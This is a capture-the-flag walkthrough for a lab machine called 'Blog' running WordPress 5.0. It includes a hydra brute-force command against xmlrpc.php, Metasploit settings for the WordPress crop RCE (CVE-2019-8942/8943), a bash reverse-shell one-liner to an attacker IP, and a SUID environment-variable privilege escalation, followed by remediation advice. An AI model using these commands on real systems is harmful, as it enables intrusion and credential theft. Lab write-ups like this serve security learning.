Target IP: blog.thm (Requires /etc/hosts entry)
Difficulty: Medium
Objective: User (user.txt) & Root (root.txt) Flags
1. Executive Summary
The “Blog” machine is a Linux server hosting a WordPress 5.0 instance. Initial enumeration reveals an exposed SMB share containing media files (likely steganography rabbit holes). The primary vector involves identifying valid users via WordPress enumeration and brute-forcing their credentials using the XML-RPC interface. With valid credentials (Author role), we chain CVE-2019-8942 and CVE-2019-8943 (WordPress Crop RCE) to gain remote code execution. Privilege escalation is achieved by reverse-engineering a custom SUID binary (checker) which grants root access if a specific environment variable is set.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Nmap & SMBMap.
- T1110 (Brute Force): Credential stuffing via
xmlrpc.php. - T1190 (Exploit Public-Facing App): Exploiting WordPress Core (Image Crop RCE).
- T1548 (Abuse Elevation Control Mechanism): Exploiting a custom SUID binary via environment variable injection.
2. Operational Setup
Host Configuration
echo "10.10.x.x blog.thm" | sudo tee -a /etc/hostsWorkspace (Tmux)
- Pane 1 (Recon):
nmap,wpscan,hydra. - Pane 2 (Exploit):
msfconsole. - Pane 3 (Shell): Netcat listeners.
3. Enumeration: “What do we see?”
A. Network Scanning
We start with Nmap.
nmap -sC -sV -oA nmap/blog blog.thmResults:
- 22/tcp (SSH): OpenSSH 7.6p1.
- 80/tcp (HTTP): Apache 2.4.29 running WordPress 5.0.
- 139/445 (SMB): Samba (Workgroup).
B. SMB Enumeration
We verify the SMB shares immediately.
smbmap -H blog.thmFindings:
- Share:
BillySMB(Read/Write). - Files:
Alice-White-Rabbit.jpg,tswift.mp4,check-this.png.
Analysis (The Rabbit Hole):
While these files scream “Steganography,” in a real-world assessment (and high-quality boxes), stego is rare unless it’s a CTF specific challenge. We note them, download them just in case (smbclient //blog.thm/BillySMB), but do not spend hours analyzing bits unless the web vector fails.
C. Web Enumeration (WordPress)
We know it is WordPress 5.0. This is an old version (2018/2019 era) and highly likely vulnerable.
1. User Enumeration:
We can use wpscan to enumerate users.
wpscan --url http://blog.thm --enumerate u- Users Found:
kwheel,bjoel.
2. Credential Brute-Forcing (The Key Step):
You correctly identified that the RCE requires authentication (usually Author+ privileges). We use hydra to attack the xmlrpc.php endpoint, which is faster and often less rate-limited than the main login page.
hydra -L users.txt -P /opt/rockyou.txt blog.thm http-post-form "/xmlrpc.php:<?xml version='1.0'?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>^USER^</string></value></param><param><value><string>^PASS^</string></value></param></params></methodCall>:Invalid"Success:
- User:
kwheel - Password:
cutiepie1
4. Initial Access: WordPress Crop RCE
The Vulnerability (CVE-2019-8942 & CVE-2019-8943)
WordPress 5.0 has a logic flaw in how it handles image cropping.
- LFI: Allows a user to reference a file via path traversal (CVE-2019-8942).
- RCE: Allows a user to write the cropped image data into the image file itself. By injecting PHP code into the EXIF data of an image and then cropping it, the PHP code is preserved and executed when the file is included.
Exploitation via Metasploit
Since manual exploitation of this chain is complex (involves crafting specific EXIF data), Metasploit is the efficient choice here.
msfconsole
use exploit/multi/http/wp_crop_rce
set RHOSTS blog.thm
set USERNAME kwheel
set PASSWORD cutiepie1
set LHOST 10.10.x.x
runResult: Meterpreter session opened. Stabilization:
shell
/bin/bash -c 'bash -i >& /dev/tcp/10.10.x.x/9001 0>&1'We are now www-data.
5. Privilege Escalation: SUID checker
Enumeration
We run a standard SUID search.
find / -perm -u=s -type f 2>/dev/nullOutput:
/usr/sbin/checker <-- NOT STANDARD
/usr/bin/passwd
/usr/bin/sudo
...A binary named checker in /usr/sbin is highly suspicious.
Reverse Engineering
We need to understand what this binary does.
- Basic Execution:
/usr/sbin/checker
# Output: "Not an Admin"- Static Analysis (
strings): Runningstringson a binary prints all printable characters. This is the fastest way to spot hardcoded variables.
strings /usr/sbin/checkerOutput:
getenv
admin
/bin/bash
setuidAnalysis:
getenv: It’s looking for an environment variable.admin: Likely the name of the variable./bin/bash+setuid: If the condition is met, it spawns a root shell.
- Dynamic Analysis (
ltrace- Optional): Ifstringswasn’t clear,ltrace /usr/sbin/checkerwould show the library callgetenv("admin").
Exploitation
We simply set the environment variable that the binary checks for. The value likely doesn’t matter, it just checks for existence or a generic truthy value, but admin is a safe guess.
export admin=admin
/usr/sbin/checkerResult:
# whoami
rootFlags:
- User:
/home/bjoel/user.txt(or/media/usb/user.txt) - Root:
/root/root.txt
6. Remediation (Blue Team)
- Patch WordPress: Update to the latest version immediately. WordPress 5.0 is critically vulnerable.
- Disable XML-RPC: If remote publishing is not needed, block access to
xmlrpc.phpvia web server config (Apache/Nginx) to prevent brute-force attacks. - Audit SUID Binaries:
- Custom binaries like
checkershould generally not have the SUID bit set unless absolutely necessary. - Using environment variables for authentication in SUID binaries is insecure because any user can set them.